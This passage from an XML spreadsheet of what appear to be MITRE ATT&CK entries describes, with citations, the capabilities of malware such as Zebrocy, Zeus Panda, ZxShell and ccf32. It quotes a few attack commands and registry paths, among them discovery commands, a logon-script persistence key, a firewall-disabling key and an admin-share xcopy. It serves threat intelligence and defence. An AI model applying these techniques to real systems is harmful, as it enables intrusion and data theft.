    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to enumerate system information.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to discover and manipulate Windows services.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) communicates over HTTP for C2.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to execute shell commands.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) creates Registry keys to allow itself to run as various services.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t xml:space="preserve">[Zebrocy](https://attack.mitre.org/software/S0251)  has used a method similar to RC4 as well as AES for encryption and hexadecimal for encoding data before exfiltration. (Citation: Securelist Sofacy Feb 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: CISA Zebrocy Oct 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Zebrocy](https://attack.mitre.org/software/S0251) uses SSL and AES ECB for encrypting C2 communications.(Citation: ESET Zebrocy Nov 2018)(Citation: ESET Zebrocy May 2019)(Citation: CISA Zebrocy Oct 2020) </t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) scans the system and automatically collects files with the following extensions: .doc, .docx, ,.xls, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .jpeg, .bmp, .tiff, .kum, .tlg, .sbx, .cr, .hse, .hsf, and .lhz.(Citation: ESET Zebrocy Nov 2018)(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) installs an application-defined Windows hook to get notified when a network drive has been attached, so it can then use the hook to call its RecordToFile file stealing method.(Citation: Securelist Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) has the capability to upload dumper tools that extract credentials from web browsers and store them in database files.(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) decodes its secondary payload and writes it to the victim’s machine. [Zebrocy](https://attack.mitre.org/software/S0251) also uses AES and XOR to decrypt strings and payloads.(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Zebrocy](https://attack.mitre.org/software/S0251) has exfiltrated data to the designated C2 server using HTTP POST requests.(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: CISA Zebrocy Oct 2020) </t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) has a command to delete files and directories.(Citation: ESET Zebrocy Nov 2018)(Citation: ESET Zebrocy May 2019)(Citation: CISA Zebrocy Oct 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Zebrocy](https://attack.mitre.org/software/S0251) searches for files that are 60mb and less and contain the following extensions: .doc, .docx, .xls, .xlsx, .ppt, .pptx, .exe, .zip, and .rar. [Zebrocy](https://attack.mitre.org/software/S0251) also runs the &lt;code&gt;echo %APPDATA%&lt;/code&gt; command to list the contents of the directory.(Citation: Securelist Sofacy Feb 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: ESET Zebrocy May 2019) [Zebrocy](https://attack.mitre.org/software/S0251) can obtain the current execution path as well as perform drive enumeration.(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: CISA Zebrocy Oct 2020) </t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) obtains additional code to execute on the victim's machine, including the downloading of a secondary payload.(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) stores all collected information in a single file before exfiltration.(Citation: ESET Zebrocy Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) performs persistence with a logon script via adding to the Registry key &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt;.(Citation: ESET Zebrocy Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) uses SMTP and POP3 for C2.(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) identifies network drives when they are added to victim systems.(Citation: Securelist Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) enumerates information about connected storage devices.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) uses the &lt;code&gt;tasklist&lt;/code&gt; and &lt;code&gt;wmic process get Capture, ExecutablePath&lt;/code&gt; commands to gather the processes running on the system.(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) executes the &lt;code&gt;reg query&lt;/code&gt; command to obtain information in the Registry.(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) creates an entry in a Registry Run key for the malware to execute on startup.(Citation: ESET Zebrocy Nov 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) has a command to create a scheduled task for persistence.(Citation: CISA Zebrocy Oct 2020)</t>
  </si>
  <si>
    <t>A variant of [Zebrocy](https://attack.mitre.org/software/S0251) captures screenshots of the victim’s machine in JPEG and BMP format.(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: CISA Zebrocy Oct 2020)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251)'s Delphi variant was packed with UPX.(Citation: Unit42 Sofacy Dec 2018)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) has used URL/Percent Encoding on data exfiltrated via HTTP POST requests.(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) collects the OS version, computer name and serial number for the storage volume C:\. [Zebrocy](https://attack.mitre.org/software/S0251) also runs the &lt;code&gt;systeminfo&lt;/code&gt; command to gather system information. (Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: CISA Zebrocy Oct 2020)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) runs the &lt;code&gt;ipconfig /all&lt;/code&gt; command.(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) uses &lt;code&gt;netstat -aon&lt;/code&gt; to gather network connection information.(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) gets the username from the system.(Citation: ESET Zebrocy Nov 2018)(Citation: CISA Zebrocy Oct 2020)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) gathers the current time zone and date information from the system.(Citation: ESET Zebrocy Nov 2018)(Citation: CISA Zebrocy Oct 2020)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) uses HTTP for C2.(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Zebrocy](https://attack.mitre.org/software/S0251) uses cmd.exe to execute commands on the system.(Citation: ESET Zebrocy May 2019)(Citation: CISA Zebrocy Oct 2020) </t>
  </si>
  <si>
    <t>One variant of [Zebrocy](https://attack.mitre.org/software/S0251) uses WMI queries to gather information.(Citation: Unit42 Sofacy Dec 2018)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has obfuscated DLLs and functions using dummy API calls inserted between real instructions.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>Many [ZeroT](https://attack.mitre.org/software/S0230) samples can perform UAC bypass by using eventvwr.exe to execute a malicious file.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has used DLL side-loading to load malicious payloads.(Citation: Proofpoint TA459 April 2017)(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) shellcode decrypts and decompresses its RC4-encrypted payload.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) can download additional payloads onto the victim.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has encrypted its payload with RC4.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>Some [ZeroT](https://attack.mitre.org/software/S0230) DLL files have been packed with UPX.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has retrieved stage 2 payloads as Bitmap images that use Least Significant Bit (LSB) steganography.(Citation: Proofpoint TA459 April 2017)(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has used RC4 to encrypt C2 traffic.(Citation: Proofpoint TA459 April 2017)(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) gathers the victim's computer name, Windows version, and system language, and then sends it to its C2 server.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) gathers the victim's IP address and domain information, and then sends it to its C2 server.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has used HTTP for C2.(Citation: Proofpoint TA459 April 2017)(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) can add a new service to ensure [PlugX](https://attack.mitre.org/software/S0013) persists on the system when delivered as another payload onto the system.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>Some variants of the [Zeroaccess](https://attack.mitre.org/software/S0027) Trojan have been known to store data in Extended Attributes.(Citation: Ciubotariu 2014)</t>
  </si>
  <si>
    <t>[Zeroaccess](https://attack.mitre.org/software/S0027) is a kernel-mode rootkit.(Citation: Sophos ZeroAccess)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) can hook GetClipboardData function to watch for clipboard pastes to collect.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Zeus Panda](https://attack.mitre.org/software/S0330) can launch remote scripts on the victim’s machine.(Citation: GDATA Zeus Panda June 2017)	</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) hooks processes by leveraging its own IAT hooked functions.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) decrypts strings in the code during the execution process.(Citation: Talos Zeus Panda Nov 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) has a command to delete a file. It also can uninstall scripts and delete files to cover its track.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) searches for specific directories on the victim’s machine.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) can download additional malware plug-in modules and execute them on the victim’s machine.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) can perform keylogging on the victim’s machine by hooking the functions TranslateMessage and WM_KEYDOWN.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) modifies several Registry keys under &lt;code&gt;HKCU\Software\Microsoft\Internet Explorer\ PhishingFilter\&lt;/code&gt; to disable phishing filters.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) encrypts strings with XOR and obfuscates the macro code from the initial payload. [Zeus Panda](https://attack.mitre.org/software/S0330) also encrypts all configuration and settings in AES and RC4.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) checks processes on the system and if they meet the necessary requirements, it injects into that process.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) uses PowerShell to download and execute the payload.(Citation: Talos Zeus Panda Nov 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) checks for running processes on the victim’s machine.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) checks for the existence of a Registry key and if it contains certain values.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) adds persistence by creating Registry Run keys.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) can take screenshots of the victim’s machine.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) checks to see if anti-virus, anti-spyware, or firewall products are installed in the victim’s environment.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) collects the OS version, system architecture, computer name, product ID, install date, and information on the keyboard mapping to determine the language used on the system.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) queries the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects LANG_RUSSIAN, LANG_BELARUSIAN, LANG_KAZAK, or LANG_UKRAINIAN.(Citation: Talos Zeus Panda Nov 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) collects the current system time (UTC) and sends it back to the C2 server.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) uses HTTP for C2 communications.(Citation: Talos Zeus Panda Nov 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) can launch an interface where it can execute several commands on the victim’s PC.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zox](https://attack.mitre.org/software/S0672) has the ability to upload files from a targeted system.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Zox](https://attack.mitre.org/software/S0672) has the ability to leverage local and remote exploits to escalate privileges.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Zox](https://attack.mitre.org/software/S0672) can enumerate files on a compromised host.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Zox](https://attack.mitre.org/software/S0672) can download files to a compromised machine.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Zox](https://attack.mitre.org/software/S0672) has been encoded with Base64.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Zox](https://attack.mitre.org/software/S0672) has the ability to list processes.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Zox](https://attack.mitre.org/software/S0672) has the ability to use SMB for communication.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Zox](https://attack.mitre.org/software/S0672) has used the .PNG file format for C2 communications.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Zox](https://attack.mitre.org/software/S0672) can enumerate attached drives.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command to clear system event logs.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command called RunAs, which creates a new process as another user or process context.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) hooks several API functions to spawn system threads.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) can transfer files from a compromised host.(Citation: Talos ZxShell Oct 2014)</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can disable the firewall by modifying the registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile&lt;/code&gt;.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can kill AV products' processes.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) is injected into a shared SVCHOST process.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a feature to perform SYN flood attack on a host.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) has been dropped through exploitation of CVE-2011-2462, CVE-2013-3163, and CVE-2014-0322.(Citation: Talos ZxShell Oct 2014)</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can delete files from the system.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has used FTP for C2 connections.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command to open a file manager and explorer on the system.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command to transfer files from a remote host.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a feature to capture a remote computer's keystrokes using a keylogger.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) has a feature to create local user accounts.(Citation: Talos ZxShell Oct 2014)</t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) can create Registry entries to enable services to run.(Citation: Talos ZxShell Oct 2014)</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can leverage native API including &lt;code&gt;RegisterServiceCtrlHandler &lt;/code&gt; to register a service.RegisterServiceCtrlHandler </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can launch port scans.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) can use ports 1985 and 1986 in HTTP/S communication.(Citation: Talos ZxShell Oct 2014)</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command, ps, to obtain a listing of processes on the system.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can set up an HTTP or SOCKS proxy.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can query the netsvc group value data located in the svchost group Registry key.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has remote desktop functionality.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has used rundll32.exe to execute other DLLs and named pipes.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) can capture screenshots.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) can create a new service for execution.(Citation: Talos ZxShell Oct 2014)</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can collect the local hostname, operating system details, CPU speed, and total physical memory.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can collect the owner and organization information from the target workstation.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can check the services on the system.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) supports functionality for VNC sessions.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command to perform video device spying.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has used HTTP for C2 connections.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) can launch a reverse command shell.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014)(Citation: Secureworks BRONZEUNION Feb 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can create a new service using the service parser function ProcessScCommand.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) can collect data from a compromised host.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) has used a XOR key to decrypt strings.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) can download and execute additional files.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) has relied on victims to open a malicious attachment delivered via email.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) has been disguised as a Windows security update service.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) has used API functions such as `Process32First`, `Process32Next`, and `ShellExecuteA`.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) has been encoded to avoid detection from static analysis tools.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) has created a snapshot of running processes using `CreateToolhelp32Snapshot`.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) can search the registry of a compromised host.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) has used scheduled tasks for persistence and execution.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) can search a compromised host to determine if it is running Windows Defender or Kasperky antivirus.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) has been distributed via spearphishing emails, usually containing a malicious RTF or Excel attachment.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxxZ](https://attack.mitre.org/software/S1013) has collected the host name and operating system product name from a compromised machine.(Citation: Cisco Talos Bitter Bangladesh May 2022) </t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) can collect the username from a compromised host.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>[adbupd](https://attack.mitre.org/software/S0202) contains a copy of the OpenSSL library to encrypt C2 traffic.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[adbupd](https://attack.mitre.org/software/S0202) can run a copy of cmd.exe.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[adbupd](https://attack.mitre.org/software/S0202) can use a WMI script to achieve persistence.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[at](https://attack.mitre.org/software/S0110) can be used to schedule a task on a system to be executed at a specific date or time.(Citation: TechNet At)(Citation: Linux at)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to download files from C2 to the infected host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has added itself to the Registry Run key as "NVIDIA" to appear legitimate.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to use the &lt;code&gt;WinExec&lt;/code&gt; API to execute malware on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to add itself to the Registry Run key for persistence.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to detect if the infected host is running an anti-virus process.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) can extract malware from a downloaded JPEG.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to send system volume information to C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to determine the local time to ensure malware installation only happens during the hours that the infected system is active.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) has used `xcopy \\&lt;target_host&gt;\c$\users\public\path.7z c:\users\public\bin\&lt;target_host&gt;.7z /H /Y` to archive collected files.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) can be used to automatically collect files from a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) can collect files from a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) can upload collected data and files to an FTP server.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) can delete files and folders from compromised machines.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) can parse collected files to identify specific file extensions.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) has created a hidden directory on targeted systems, naming it after the current local time (year, month, and day).(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) can temporarily store files in a hidden directory on the local host.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) has copied files to a remote machine infected with [Chinoxy](https://attack.mitre.org/software/S1041) or another backdoor.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) can run on a daily basis using a scheduled task.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
